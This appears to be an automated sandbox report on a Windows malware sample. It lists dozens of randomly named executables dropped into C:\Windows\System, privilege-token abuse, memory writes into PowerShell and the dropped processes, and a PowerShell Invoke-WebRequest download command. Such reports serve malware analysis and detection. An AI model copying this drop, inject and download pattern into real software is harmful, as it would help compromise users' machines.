File created C:\Windows\System\gGNVWaZ.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\ECpIbtA.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\vFZUGHB.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\FDQkZyV.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\RmTHant.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\zIMWGxC.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\Xtnehts.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\RCGyYXI.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\Adynpvv.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\hipYCXF.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\nwqzLtu.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\byZFKxX.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\UWpoTYx.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\YaEhsIr.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\tmDIcoa.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\BSfqrER.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\FEFmeKc.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\xKjpTBP.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\pcEEace.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\nkfcUPr.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\WbOzrva.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\YhgVmGn.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\hnjGnTw.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\ipLDtKu.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\RibUkdb.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\ldxTEip.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\uQxcXmY.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\NJCkLRu.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\nDrrklD.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\bfNamNX.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\FrCxmhq.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\xsrwBZf.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\cqHoXbU.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\mFdQZzn.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\NGCcert.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\wFyaMHP.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\qTNNPvB.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\toylOnz.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\alnnnlL.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\cVcXWbU.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\qZFvxOm.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\fGyWuhZ.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\OQOwuzG.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\sCMIcLA.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\rOXVxnu.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
File created C:\Windows\System\UQAnscE.exe C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1920 wrote to memory of 4468 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1920 wrote to memory of 4468 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1920 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\UqERfDb.exe
PID 1920 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\UqERfDb.exe
PID 1920 wrote to memory of 3708 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\dWmosVM.exe
PID 1920 wrote to memory of 3708 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\dWmosVM.exe
PID 1920 wrote to memory of 3824 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\OQZXQuP.exe
PID 1920 wrote to memory of 3824 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\OQZXQuP.exe
PID 1920 wrote to memory of 1444 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\fFnfMUL.exe
PID 1920 wrote to memory of 1444 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\fFnfMUL.exe
PID 1920 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\ayZoGgd.exe
PID 1920 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\ayZoGgd.exe
PID 1920 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\VoQXMRm.exe
PID 1920 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\VoQXMRm.exe
PID 1920 wrote to memory of 1376 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\zLpQsMN.exe
PID 1920 wrote to memory of 1376 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\zLpQsMN.exe
PID 1920 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\SEWrPAq.exe
PID 1920 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\SEWrPAq.exe
PID 1920 wrote to memory of 892 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\eVyxpoj.exe
PID 1920 wrote to memory of 892 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\eVyxpoj.exe
PID 1920 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\lcohyhA.exe
PID 1920 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\lcohyhA.exe
PID 1920 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\fZvysLD.exe
PID 1920 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\fZvysLD.exe
PID 1920 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\hAglDlU.exe
PID 1920 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\hAglDlU.exe
PID 1920 wrote to memory of 4000 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\KSyLfCf.exe
PID 1920 wrote to memory of 4000 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\KSyLfCf.exe
PID 1920 wrote to memory of 3320 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\lbFJgkS.exe
PID 1920 wrote to memory of 3320 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\lbFJgkS.exe
PID 1920 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\MyCNbMq.exe
PID 1920 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\MyCNbMq.exe
PID 1920 wrote to memory of 3720 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\KjSrPfr.exe
PID 1920 wrote to memory of 3720 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\KjSrPfr.exe
PID 1920 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\bLbAGKl.exe
PID 1920 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\bLbAGKl.exe
PID 1920 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\YJpnhyR.exe
PID 1920 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\YJpnhyR.exe
PID 1920 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\TNCjteE.exe
PID 1920 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\TNCjteE.exe
PID 1920 wrote to memory of 3740 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\wNXPxVA.exe
PID 1920 wrote to memory of 3740 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\wNXPxVA.exe
PID 1920 wrote to memory of 1084 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\vPFxrLo.exe
PID 1920 wrote to memory of 1084 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\vPFxrLo.exe
PID 1920 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\BCfawpd.exe
PID 1920 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\BCfawpd.exe
PID 1920 wrote to memory of 4080 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\XVAUXyo.exe
PID 1920 wrote to memory of 4080 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\XVAUXyo.exe
PID 1920 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\ipmiTZu.exe
PID 1920 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\ipmiTZu.exe
PID 1920 wrote to memory of 4872 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\CnDzQhq.exe
PID 1920 wrote to memory of 4872 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\CnDzQhq.exe
PID 1920 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\rUkxiYq.exe
PID 1920 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\rUkxiYq.exe
PID 1920 wrote to memory of 3248 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\FpbnwVO.exe
PID 1920 wrote to memory of 3248 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\FpbnwVO.exe
PID 1920 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\ghXMNdx.exe
PID 1920 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\ghXMNdx.exe
PID 1920 wrote to memory of 4184 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\oCNWiQY.exe
PID 1920 wrote to memory of 4184 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\oCNWiQY.exe
PID 1920 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\uGBIftN.exe
PID 1920 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\uGBIftN.exe
PID 1920 wrote to memory of 3448 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\qgmgYui.exe
PID 1920 wrote to memory of 3448 N/A C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe C:\Windows\System\qgmgYui.exe

Processes

C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\8a422a8c9d8bb3d50cf02c79f8bdcf40_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\UqERfDb.exe

C:\Windows\System\UqERfDb.exe

C:\Windows\System\dWmosVM.exe

C:\Windows\System\dWmosVM.exe

C:\Windows\System\OQZXQuP.exe

C:\Windows\System\OQZXQuP.exe

C:\Windows\System\fFnfMUL.exe

C:\Windows\System\fFnfMUL.exe

C:\Windows\System\ayZoGgd.exe

C:\Windows\System\ayZoGgd.exe

C:\Windows\System\VoQXMRm.exe

C:\Windows\System\VoQXMRm.exe

C:\Windows\System\zLpQsMN.exe

C:\Windows\System\zLpQsMN.exe

C:\Windows\System\SEWrPAq.exe

C:\Windows\System\SEWrPAq.exe

C:\Windows\System\eVyxpoj.exe

C:\Windows\System\eVyxpoj.exe

C:\Windows\System\lcohyhA.exe

C:\Windows\System\lcohyhA.exe

C:\Windows\System\fZvysLD.exe

C:\Windows\System\fZvysLD.exe

C:\Windows\System\hAglDlU.exe

C:\Windows\System\hAglDlU.exe

C:\Windows\System\KSyLfCf.exe

C:\Windows\System\KSyLfCf.exe

C:\Windows\System\lbFJgkS.exe

C:\Windows\System\lbFJgkS.exe

C:\Windows\System\MyCNbMq.exe

C:\Windows\System\MyCNbMq.exe

C:\Windows\System\KjSrPfr.exe

C:\Windows\System\KjSrPfr.exe

C:\Windows\System\bLbAGKl.exe

C:\Windows\System\bLbAGKl.exe

C:\Windows\System\YJpnhyR.exe

C:\Windows\System\YJpnhyR.exe

C:\Windows\System\TNCjteE.exe

C:\Windows\System\TNCjteE.exe

C:\Windows\System\wNXPxVA.exe

C:\Windows\System\wNXPxVA.exe

C:\Windows\System\vPFxrLo.exe

C:\Windows\System\vPFxrLo.exe

C:\Windows\System\BCfawpd.exe

C:\Windows\System\BCfawpd.exe

C:\Windows\System\XVAUXyo.exe

C:\Windows\System\XVAUXyo.exe

C:\Windows\System\ipmiTZu.exe

C:\Windows\System\ipmiTZu.exe

C:\Windows\System\CnDzQhq.exe

C:\Windows\System\CnDzQhq.exe

C:\Windows\System\rUkxiYq.exe

C:\Windows\System\rUkxiYq.exe

C:\Windows\System\FpbnwVO.exe

C:\Windows\System\FpbnwVO.exe

C:\Windows\System\ghXMNdx.exe

C:\Windows\System\ghXMNdx.exe

C:\Windows\System\oCNWiQY.exe

C:\Windows\System\oCNWiQY.exe

C:\Windows\System\uGBIftN.exe

C:\Windows\System\uGBIftN.exe

C:\Windows\System\qgmgYui.exe

C:\Windows\System\qgmgYui.exe

C:\Windows\System\TGajqON.exe

C:\Windows\System\TGajqON.exe

C:\Windows\System\pgDfvIh.exe

C:\Windows\System\pgDfvIh.exe

C:\Windows\System\NvtJcqt.exe

C:\Windows\System\NvtJcqt.exe

C:\Windows\System\tPuyDkz.exe

C:\Windows\System\tPuyDkz.exe

C:\Windows\System\Xsbfufl.exe

C:\Windows\System\Xsbfufl.exe

C:\Windows\System\cmKstpT.exe

C:\Windows\System\cmKstpT.exe

C:\Windows\System\KDGpsKl.exe

C:\Windows\System\KDGpsKl.exe

C:\Windows\System\PBawdXn.exe

C:\Windows\System\PBawdXn.exe

C:\Windows\System\CmkIpal.exe

C:\Windows\System\CmkIpal.exe

C:\Windows\System\sGxZvtX.exe

C:\Windows\System\sGxZvtX.exe

C:\Windows\System\uElNzLn.exe

C:\Windows\System\uElNzLn.exe

C:\Windows\System\FjBtxix.exe

C:\Windows\System\FjBtxix.exe

C:\Windows\System\kZvKdKw.exe

C:\Windows\System\kZvKdKw.exe

C:\Windows\System\ECaZRCM.exe

C:\Windows\System\ECaZRCM.exe

C:\Windows\System\ABVjHxt.exe

C:\Windows\System\ABVjHxt.exe

C:\Windows\System\dZRkMVV.exe

C:\Windows\System\dZRkMVV.exe

C:\Windows\System\qfHIFvo.exe

C:\Windows\System\qfHIFvo.exe

C:\Windows\System\YZLoNkU.exe

C:\Windows\System\YZLoNkU.exe

C:\Windows\System\SXJplkG.exe

C:\Windows\System\SXJplkG.exe

C:\Windows\System\qyJJKIO.exe

C:\Windows\System\qyJJKIO.exe

C:\Windows\System\KalCaWo.exe

C:\Windows\System\KalCaWo.exe

C:\Windows\System\VwFKNWp.exe

C:\Windows\System\VwFKNWp.exe

C:\Windows\System\ypGmHzW.exe

C:\Windows\System\ypGmHzW.exe

C:\Windows\System\ZrsKOui.exe

C:\Windows\System\ZrsKOui.exe

C:\Windows\System\AAKAWJl.exe

C:\Windows\System\AAKAWJl.exe

C:\Windows\System\FKIWNZT.exe

C:\Windows\System\FKIWNZT.exe

C:\Windows\System\jDKoUbG.exe

C:\Windows\System\jDKoUbG.exe

C:\Windows\System\vmPhqlp.exe

C:\Windows\System\vmPhqlp.exe

C:\Windows\System\fEgyKdC.exe

C:\Windows\System\fEgyKdC.exe

C:\Windows\System\QwJJVDV.exe

C:\Windows\System\QwJJVDV.exe

C:\Windows\System\sUsxAPk.exe

C:\Windows\System\sUsxAPk.exe

C:\Windows\System\cbiNHXZ.exe

C:\Windows\System\cbiNHXZ.exe

C:\Windows\System\frKoCHM.exe

C:\Windows\System\frKoCHM.exe

C:\Windows\System\QWNihwF.exe

C:\Windows\System\QWNihwF.exe

C:\Windows\System\PavWOvw.exe

C:\Windows\System\PavWOvw.exe

C:\Windows\System\CpShVcT.exe

C:\Windows\System\CpShVcT.exe

C:\Windows\System\ZoiXqtD.exe

C:\Windows\System\ZoiXqtD.exe

C:\Windows\System\PIlCauQ.exe

C:\Windows\System\PIlCauQ.exe

C:\Windows\System\FHLrvvM.exe

C:\Windows\System\FHLrvvM.exe

C:\Windows\System\yOcUwwA.exe

C:\Windows\System\yOcUwwA.exe

C:\Windows\System\SwnegTY.exe

C:\Windows\System\SwnegTY.exe

C:\Windows\System\gAMdwiS.exe

C:\Windows\System\gAMdwiS.exe

C:\Windows\System\mIWALEh.exe

C:\Windows\System\mIWALEh.exe

C:\Windows\System\wOKuUmB.exe

C:\Windows\System\wOKuUmB.exe

C:\Windows\System\rGMLLlR.exe

C:\Windows\System\rGMLLlR.exe

C:\Windows\System\cuEiRUQ.exe

C:\Windows\System\cuEiRUQ.exe

C:\Windows\System\akwXqhw.exe

C:\Windows\System\akwXqhw.exe

C:\Windows\System\uvcJVSs.exe

C:\Windows\System\uvcJVSs.exe

C:\Windows\System\FUbdSMx.exe

C:\Windows\System\FUbdSMx.exe

C:\Windows\System\VlQPfwv.exe

C:\Windows\System\VlQPfwv.exe

C:\Windows\System\oNaoKCV.exe

C:\Windows\System\oNaoKCV.exe

C:\Windows\System\vNUjbFy.exe

C:\Windows\System\vNUjbFy.exe

C:\Windows\System\LITPUkG.exe

C:\Windows\System\LITPUkG.exe

C:\Windows\System\iYtbBDj.exe

C:\Windows\System\iYtbBDj.exe

C:\Windows\System\HXSklbY.exe

C:\Windows\System\HXSklbY.exe

C:\Windows\System\hnjGnTw.exe

C:\Windows\System\hnjGnTw.exe

C:\Windows\System\QNUBzas.exe

C:\Windows\System\QNUBzas.exe

C:\Windows\System\rBlKCva.exe

C:\Windows\System\rBlKCva.exe

C:\Windows\System\gxeuWyI.exe

C:\Windows\System\gxeuWyI.exe

C:\Windows\System\KnTnMcR.exe

C:\Windows\System\KnTnMcR.exe

C:\Windows\System\lVIRJKb.exe

C:\Windows\System\lVIRJKb.exe

C:\Windows\System\cDLlvZc.exe

C:\Windows\System\cDLlvZc.exe

C:\Windows\System\GpgZBXc.exe

C:\Windows\System\GpgZBXc.exe

C:\Windows\System\fmTycXL.exe

C:\Windows\System\fmTycXL.exe

C:\Windows\System\kWrUoxS.exe

C:\Windows\System\kWrUoxS.exe

C:\Windows\System\fppKpzR.exe

C:\Windows\System\fppKpzR.exe

C:\Windows\System\KhwBqCk.exe

C:\Windows\System\KhwBqCk.exe

C:\Windows\System\AbxTMWy.exe

C:\Windows\System\AbxTMWy.exe

C:\Windows\System\IJXQsqv.exe

C:\Windows\System\IJXQsqv.exe

C:\Windows\System\bkjLfQf.exe

C:\Windows\System\bkjLfQf.exe

C:\Windows\System\NAyDbDR.exe

C:\Windows\System\NAyDbDR.exe

C:\Windows\System\OUMPvLK.exe

C:\Windows\System\OUMPvLK.exe

C:\Windows\System\BcrhXYJ.exe

C:\Windows\System\BcrhXYJ.exe

C:\Windows\System\yAOUfGS.exe

C:\Windows\System\yAOUfGS.exe

C:\Windows\System\MQGUCXZ.exe

C:\Windows\System\MQGUCXZ.exe

C:\Windows\System\LskVcOs.exe

C:\Windows\System\LskVcOs.exe

